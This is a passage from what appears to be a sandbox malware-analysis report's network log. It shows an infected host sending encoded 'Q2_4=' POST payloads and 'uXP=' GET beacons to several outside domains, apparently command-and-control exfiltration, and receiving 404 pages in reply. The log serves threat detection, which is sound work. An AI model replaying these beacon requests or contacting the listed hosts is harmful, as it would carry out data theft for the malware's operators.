                                                                                                              Data Raw: 51 32 5f 34 3d 69 65 2b 51 36 7a 6c 46 42 68 75 66 49 6a 4e 4c 73 4e 67 32 34 6e 64 4b 34 35 36 35 33 46 4d 49 38 59 30 48 54 39 38 58 66 51 62 61 66 64 43 35 34 79 50 47 6e 52 66 68 45 34 48 44 6e 4e 6c 64 75 56 6d 65 58 47 4d 47 30 6f 65 79 42 4b 63 44 79 73 6a 54 44 6b 2f 7a 4c 74 45 39 51 56 75 62 70 48 71 37 33 4e 54 41 6e 30 71 49 74 77 65 54 5a 75 46 73 50 34 39 72 45 45 79 4e 79 64 41 63 36 56 34 34 59 30 79 4e 62 46 6f 50 48 51 47 76 2f 59 67 49 44 6f 33 61 57 76 66 32 58 52 4f 50 6b 4f 38 4b 76 74 2b 79 35 6f 33 38 6a 68 74 67 34 58 4e 7a 54 33 79 33 45 55 32 32 42 34 73 49 64 31 72 2f 68 6d 45 62 63 4f 42 7a 31 44 4f 36 43 41 46 75 2f 78 46 4f 4b 4b 55 31 76 68 36 4e 6e 79 39 75 53 46 66 64 33 46 4a 39 39 34 59 4d 32 41 51 32 35 78 4a 64 52 4a 4b 59 72 32 34 6d 47 65 62 66 74 56 4a 4a 4c 35 41 6b 65 48 34 61 52 33 4e 46 50 46 2f 35 78 57 6e 67 44 49 2b 31 50 41 39 59 64 77 37 47 79 67 66 75 52 77 54 49 54 34 6a 32 6e 6f 55 70 72 35 70 6b 79 7a 55 44 37 69 42 74 4a 37 74 43 33 67 34 57 6c [TRUNCATED]
                                                                                                              Data Ascii: Q2_4=ie+Q6zlFBhufIjNLsNg24ndK45653FMI8Y0HT98XfQbafdC54yPGnRfhE4HDnNlduVmeXGMG0oeyBKcDysjTDk/zLtE9QVubpHq73NTAn0qItweTZuFsP49rEEyNydAc6V44Y0yNbFoPHQGv/YgIDo3aWvf2XROPkO8Kvt+y5o38jhtg4XNzT3y3EU22B4sId1r/hmEbcOBz1DO6CAFu/xFOKKU1vh6Nny9uSFfd3FJ994YM2AQ25xJdRJKYr24mGebftVJJL5AkeH4aR3NFPF/5xWngDI+1PA9Ydw7GygfuRwTIT4j2noUpr5pkyzUD7iBtJ7tC3g4WlTbMH99aCOyvM6tGfBiuqGt4g/aMDYVOTLL4CZxvcGj/ci8UgYqm1sbP1m4hhkD00y7AKAhqWmBRYzAkKy+WHo480SfDCr1gRXLU0+RT6PEXPgebTe1IxDfjC6jFecx6q7QXRVQOvFNvDMjUR8q2Kxyl0eDfSqVcMlq+SNAMpib/J80w+bkxtwHCeeNaK5Xhwq/olhFfazsIkdg6YgY5/XM8FmMrsbxcCOMuwZkuSVZ4hZ6W5xKrR0FtJLRql/AzqhQ36gtnd81DpOoeHii+wRQv3Pan3WARFWXnEgDiYzozSfmAlzITW+PlkC5RWRNbS48gvF2EZCAz9s0BKHVzUUc6UvNinFdI/iEJHUBoc66YvqNfaav9naC7HKkm42s3Xsd55hC/O1ESEy6DGKv/2/Q9/+nL3+IfAoVvyHOWS519pyq3X2oNR0NzH9+r9eDkM9Xaerfvd7zKd2VIW8VE9ORTJk6IY4GQeotvEZxjkWA0bsmvNUwTzNhu48rANPb73k9yxrb4rezI7Oe1qDxcBgCqVRCKfyG53tvNoerjL/j4tTKZFOssHItrPi+PoDZlbgSD2tnTbqv7fROgW0CSCxwCjDyREiCIHNpuPtyP6GcD+g/kQWPxHcORg+rAVUmej5AGb3HI0gbyEuZsvZLPENO3yrHDKD279xO [TRUNCATED]
                                                                                                              Nov 5, 2024 15:38:37.704250097 CET367INHTTP/1.1 404 Not Found
                                                                                                              Date: Tue, 05 Nov 2024 14:38:37 GMT
                                                                                                              Server: Apache
                                                                                                              Content-Length: 203
                                                                                                              Connection: close
                                                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 6f 79 30 6c 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /oy0l/ was not found on this server.</p></body></html>


                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                              69192.168.11.2049810195.110.124.13380
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Nov 5, 2024 15:38:40.225492954 CET460OUTGET /oy0l/?uXP=1HX8&Q2_4=vcWw5DdjdQnkJmRMu9Bv0nYhxIjg8XNP87kLKcEwcjL/VJXYlRnLhwXYdIbeiM5Wp1LHJGQmwLmzd8N63pnOImbiL9MWYGLhlQi4+Y3hzWOb/gf9Ze4XcY0= HTTP/1.1
                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                              Accept-Language: en-us
                                                                                                              Connection: close
                                                                                                              Host: www.nidedabeille.net
                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0.1) Gecko/20100101 Firefox/5.0.1
                                                                                                              Nov 5, 2024 15:38:40.483453989 CET367INHTTP/1.1 404 Not Found
                                                                                                              Date: Tue, 05 Nov 2024 14:38:40 GMT
                                                                                                              Server: Apache
                                                                                                              Content-Length: 203
                                                                                                              Connection: close
                                                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 6f 79 30 6c 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /oy0l/ was not found on this server.</p></body></html>


                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                              70192.168.11.2049811203.161.41.20480
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Nov 5, 2024 15:38:45.678103924 CET723OUTPOST /3qrm/ HTTP/1.1
                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                              Accept-Language: en-us
                                                                                                              Content-Length: 201
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Connection: close
                                                                                                              Cache-Control: no-cache
                                                                                                              Host: www.brunvox.site
                                                                                                              Origin: http://www.brunvox.site
                                                                                                              Referer: http://www.brunvox.site/3qrm/
                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0.1) Gecko/20100101 Firefox/5.0.1
                                                                                                              Data Raw: 51 32 5f 34 3d 67 77 32 6d 33 4d 38 58 37 33 44 47 56 32 6e 53 33 7a 45 4e 61 77 47 73 4a 42 32 39 79 70 6b 76 77 7a 54 46 30 68 77 79 6a 6a 76 6c 55 6f 31 47 41 31 34 6d 50 77 65 4b 4a 45 41 38 6f 36 47 65 37 5a 63 32 72 71 33 79 41 38 39 33 6b 51 78 4f 62 45 57 6a 6f 74 37 36 39 53 2f 41 4a 61 33 2f 79 5a 72 6c 73 48 70 31 47 4e 6a 67 4e 4c 48 53 63 4f 78 67 78 73 54 6a 61 51 33 34 49 6b 76 55 67 73 59 4c 49 46 62 69 34 2f 4e 4d 6f 78 55 62 49 32 37 50 36 35 63 65 36 49 34 52 4b 4d 56 46 66 6a 34 76 62 48 6b 6e 36 44 75 6e 67 77 67 4c 72 74 41 32 47 66 4d 4e 36 72 61 41 30 33 38 34 7a 67 3d 3d
                                                                                                              Data Ascii: Q2_4=gw2m3M8X73DGV2nS3zENawGsJB29ypkvwzTF0hwyjjvlUo1GA14mPweKJEA8o6Ge7Zc2rq3yA893kQxObEWjot769S/AJa3/yZrlsHp1GNjgNLHScOxgxsTjaQ34IkvUgsYLIFbi4/NMoxUbI27P65ce6I4RKMVFfj4vbHkn6DungwgLrtA2GfMN6raA0384zg==
                                                                                                              Nov 5, 2024 15:38:45.871273994 CET896INHTTP/1.1 404 Not Found
                                                                                                              Date: Tue, 05 Nov 2024 14:38:45 GMT
                                                                                                              Server: Apache
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              Content-Length: 690
                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                              Connection: close
                                                                                                              Content-Type: text/html
                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 30 34 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 69 73 65 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6f 76 65 72 6c 61 79 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 72 6d 69 6e 61 6c [TRUNCATED]
                                                                                                              Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/404style.css"></head><body><div class="noise"></div><div class="overlay"></div><div class="terminal"> <h1>Error <span class="errorcode">404</span></h1> <p class="output">The page you are looking for might have been removed, had its name changed or is temporarily unavailable.</p> <p class="output">Please try to <a href="#1">go back</a> or <a href="/">return to the homepage</a>.</p> <p class="output">Good luck.</p></div> </body></html>


                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                              71192.168.11.2049812203.161.41.20480
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Nov 5, 2024 15:38:48.392868996 CET743OUTPOST /3qrm/ HTTP/1.1
                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                              Accept-Language: en-us
                                                                                                              Content-Length: 221
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Connection: close
                                                                                                              Cache-Control: no-cache
                                                                                                              Host: www.brunvox.site
                                                                                                              Origin: http://www.brunvox.site
                                                                                                              Referer: http://www.brunvox.site/3qrm/
                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0.1) Gecko/20100101 Firefox/5.0.1
                                                                                                              Data Raw: 51 32 5f 34 3d 67 77 32 6d 33 4d 38 58 37 33 44 47 55 58 58 53 78 67 73 4e 53 77 47 6a 4d 42 32 39 34 4a 6b 72 77 7a 66 46 30 67 31 76 6a 52 37 6c 55 4a 46 47 48 45 34 6d 4d 77 65 4b 42 6b 41 35 6e 61 48 63 37 5a 51 51 72 72 62 79 41 38 35 33 6b 56 56 4f 61 33 4f 67 6f 39 37 38 30 79 2f 43 52 36 33 2f 79 5a 72 6c 73 48 38 69 47 4c 4c 67 4f 34 50 53 63 76 78 6e 76 63 54 38 64 51 33 34 66 30 76 51 67 73 5a 63 49 41 37 59 34 39 31 4d 6f 78 45 62 49 6e 37 4d 78 35 63 63 30 6f 35 6a 61 70 49 35 51 67 6f 55 59 58 70 2b 79 78 43 2b 6f 47 78 52 32 66 30 53 46 4d 51 2f 2b 62 6a 6f 32 31 39 6a 75 69 72 69 2f 2b 38 6e 46 55 56 6c 77 4a 71 4f 39 32 69 2b 42 52 34 3d
                                                                                                              Data Ascii: Q2_4=gw2m3M8X73DGUXXSxgsNSwGjMB294JkrwzfF0g1vjR7lUJFGHE4mMweKBkA5naHc7ZQQrrbyA853kVVOa3Ogo9780y/CR63/yZrlsH8iGLLgO4PScvxnvcT8dQ34f0vQgsZcIA7Y491MoxEbIn7Mx5cc0o5japI5QgoUYXp+yxC+oGxR2f0SFMQ/+bjo219juiri/+8nFUVlwJqO92i+BR4=
                                                                                                              Nov 5, 2024 15:38:48.576363087 CET896INHTTP/1.1 404 Not Found
                                                                                                              Date: Tue, 05 Nov 2024 14:38:48 GMT
                                                                                                              Server: Apache
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              Content-Length: 690
                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                              Connection: close
                                                                                                              Content-Type: text/html
                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 30 34 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 69 73 65 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6f 76 65 72 6c 61 79 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 72 6d 69 6e 61 6c [TRUNCATED]
                                                                                                              Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/404style.css"></head><body><div class="noise"></div><div class="overlay"></div><div class="terminal"> <h1>Error <span class="errorcode">404</span></h1> <p class="output">The page you are looking for might have been removed, had its name changed or is temporarily unavailable.</p> <p class="output">Please try to <a href="#1">go back</a> or <a href="/">return to the homepage</a>.</p> <p class="output">Good luck.</p></div> </body></html>


                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                              72192.168.11.2049813203.161.41.20480
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Nov 5, 2024 15:38:51.098264933 CET2578OUTPOST /3qrm/ HTTP/1.1
                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                              Accept-Language: en-us
                                                                                                              Content-Length: 7369
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Connection: close
                                                                                                              Cache-Control: no-cache
                                                                                                              Host: www.brunvox.site
                                                                                                              Origin: http://www.brunvox.site
                                                                                                              Referer: http://www.brunvox.site/3qrm/
                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0.1) Gecko/20100101 Firefox/5.0.1
                                                                                                              Data Raw: 51 32 5f 34 3d 67 77 32 6d 33 4d 38 58 37 33 44 47 55 58 58 53 78 67 73 4e 53 77 47 6a 4d 42 32 39 34 4a 6b 72 77 7a 66 46 30 67 31 76 6a 52 6a 6c 55 66 35 47 41 54 6b 6d 43 51 65 4b 64 30 41 34 6e 61 47 45 37 5a 59 4d 72 71 6e 45 41 2f 4e 33 6c 7a 5a 4f 64 47 4f 67 37 64 37 38 35 53 2f 42 4a 61 33 71 79 5a 62 68 73 48 73 69 47 4c 4c 67 4f 2b 72 53 61 2b 78 6e 74 63 54 6a 61 51 33 2f 49 6b 75 33 67 74 77 70 49 41 33 49 74 64 56 4d 70 56 59 62 4b 56 6a 4d 38 35 63 61 35 49 35 37 61 70 4d 63 51 67 30 70 59 58 4d 56 79 33 43 2b 6f 41 59 35 78 73 45 45 63 4d 51 45 6a 72 2b 65 77 58 6c 4e 6a 69 6a 31 78 4f 73 72 4f 69 5a 79 31 35 61 6d 70 55 57 76 66 33 2f 44 75 34 46 49 4e 4b 75 73 2b 4c 74 4c 4e 57 32 77 62 67 6f 4e 6b 59 4d 69 43 62 71 68 54 68 6d 31 65 4e 68 57 2b 4d 59 7a 4d 49 2b 73 46 6b 53 72 4b 59 58 52 4a 6c 62 69 6e 30 47 64 43 72 49 46 49 36 56 79 36 6b 58 34 68 39 57 47 46 6f 68 7a 47 36 41 66 32 49 34 44 59 51 48 61 6d 4c 74 6c 51 4b 7a 68 61 62 47 37 55 4a 39 46 38 6d 35 48 70 65 35 6e 76 [TRUNCATED]
                                                                                                              Data Ascii: Q2_4=gw2m3M8X73DGUXXSxgsNSwGjMB294JkrwzfF0g1vjRjlUf5GATkmCQeKd0A4naGE7ZYMrqnEA/N3lzZOdGOg7d785S/BJa3qyZbhsHsiGLLgO+rSa+xntcTjaQ3/Iku3gtwpIA3ItdVMpVYbKVjM85ca5I57apMcQg0pYXMVy3C+oAY5xsEEcMQEjr+ewXlNjij1xOsrOiZy15ampUWvf3/Du4FINKus+LtLNW2wbgoNkYMiCbqhThm1eNhW+MYzMI+sFkSrKYXRJlbin0GdCrIFI6Vy6kX4h9WGFohzG6Af2I4DYQHamLtlQKzhabG7UJ9F8m5Hpe5nvLX6s72vw/CvI9HsA2bFSy0Zqd/ghy6HCeMTKcrcT/JJ/fA5gCCYl6OniwykmFE8F/wC6Wb7OTw7qKVcXqt9M0Pbk68ElUk8NjBJfTT22MRVr+SecM+Kf5/y8EOtncHK2qvEhNNYKWGd2cceyV/hWpaOjcEj96yKeLZqjPHZ5Tur+J8B6dBXe23B5zD0WjeuDD9xtv51ABGRkNwD+R+X+ttHjWyMx9Ld6IRv3pZ5F3NfMnSUsihcsx9ZzpcWTrHF6dXPkGHmkrrdccF57VF5mluikZbK0XbzO71+ciTwyTmvHuZgWujfN1NqLqGcF81Ey3i3suLu3z/HuCor09lZePeZ2GQmSXRhdHkbQJWCNjrcP+oVFKQhl6sdArSy3UmMa+t7v57bSNZu4VB7SmXv6WB44G+ygqTpK8JdnFQfJjKWn5XqJzahFubLoVC+ZV48KLVf3ZVJMHiDXsAyUR9SRuY1fONxIFLLbISj7lNMKdrq3KoOXMDr7WAmuXwcB8NyxEuMoccQBobQcQRjGH2L/h5B+VAZ5G4X222pQqPqwwCurtlDHaQCGhbXuNbKVB7rLwc7x3VncVvlxS/ZGBpQmEBBD2cC3Dvt0GgAY19jYRPUi+Z8V3sS5v2Ew18uCSUvDR3phvKrU378nn9Z599gypekwO8yPDDJCZO [TRUNCATED]
                                                                                                              Nov 5, 2024 15:38:51.098340034 CET5314OUTData Raw: 5a 56 76 41 45 38 36 75 63 38 57 69 75 50 42 4f 33 46 75 78 7a 45 5a 4d 69 51 47 54 58 4c 37 54 72 54 4d 53 6c 73 67 4c 72 56 4a 57 71 7a 50 6e 62 79 34 33 42 48 71 6c 37 32 76 6e 6f 2b 45 4f 43 2f 6f 71 53 58 46 58 54 79 33 6a 52 6a 63 38 4e 70
                                                                                                              Data Ascii: ZVvAE86uc8WiuPBO3FuxzEZMiQGTXL7TrTMSlsgLrVJWqzPnby43BHql72vno+EOC/oqSXFXTy3jRjc8NpxwfuwWFtZphnX4JH9oXzxtjyTLruNqKeZl1oMYSwsogzKS9WaStS0Gn1gjewCggvgTfj+wpQ1cgsEceqodl1EzM7YVdUH7npWVskQzRDB8uhYzcXsXfDzpD/YgCZqSjz9cRrvM/YWw8GNbSzKqq/1u6pkUykoUDOM
                                                                                                              Nov 5, 2024 15:38:51.290591955 CET896INHTTP/1.1 404 Not Found
                                                                                                              Date: Tue, 05 Nov 2024 14:38:51 GMT
                                                                                                              Server: Apache
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              Content-Length: 690
                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                              Connection: close
                                                                                                              Content-Type: text/html
                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 30 34 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 69 73 65 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6f 76 65 72 6c 61 79 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 72 6d 69 6e 61 6c [TRUNCATED]
                                                                                                              Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/404style.css"></head><body><div class="noise"></div><div class="overlay"></div><div class="terminal"> <h1>Error <span class="errorcode">404</span></h1> <p class="output">The page you are looking for might have been removed, had its name changed or is temporarily unavailable.</p> <p class="output">Please try to <a href="#1">go back</a> or <a href="/">return to the homepage</a>.</p> <p class="output">Good luck.</p></div> </body></html>


                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                              73192.168.11.2049814203.161.41.20480
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Nov 5, 2024 15:38:53.816171885 CET456OUTGET /3qrm/?Q2_4=tyeG08MV0U64WH6unwcOXR2sJCf/xqZR+j/9sSFSjjXbCPJ8dUZ7AUStEW8oibqh5p8I6M3vE8IgylEGfxaCpffC+Ti1QKudju6yjlF7VN/fdeOaTvtkuuM=&uXP=1HX8 HTTP/1.1
                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                              Accept-Language: en-us
                                                                                                              Connection: close
                                                                                                              Host: www.brunvox.site
                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0.1) Gecko/20100101 Firefox/5.0.1
                                                                                                              Nov 5, 2024 15:38:54.002469063 CET911INHTTP/1.1 404 Not Found
                                                                                                              Date: Tue, 05 Nov 2024 14:38:53 GMT
                                                                                                              Server: Apache
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              Content-Length: 690
                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                              Connection: close
                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 30 34 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 69 73 65 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6f 76 65 72 6c 61 79 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 72 6d 69 6e 61 6c [TRUNCATED]
                                                                                                              Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/404style.css"></head><body><div class="noise"></div><div class="overlay"></div><div class="terminal"> <h1>Error <span class="errorcode">404</span></h1> <p class="output">The page you are looking for might have been removed, had its name changed or is temporarily unavailable.</p> <p class="output">Please try to <a href="#1">go back</a> or <a href="/">return to the homepage</a>.</p> <p class="output">Good luck.</p></div> </body></html>


                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                              74192.168.11.204981568.65.122.22280
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Nov 5, 2024 15:38:59.203851938 CET717OUTPOST /gqtu/ HTTP/1.1
                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                              Accept-Language: en-us
                                                                                                              Content-Length: 201
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Connection: close
                                                                                                              Cache-Control: no-cache
                                                                                                              Host: www.osi.garden
                                                                                                              Origin: http://www.osi.garden
                                                                                                              Referer: http://www.osi.garden/gqtu/
                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0.1) Gecko/20100101 Firefox/5.0.1
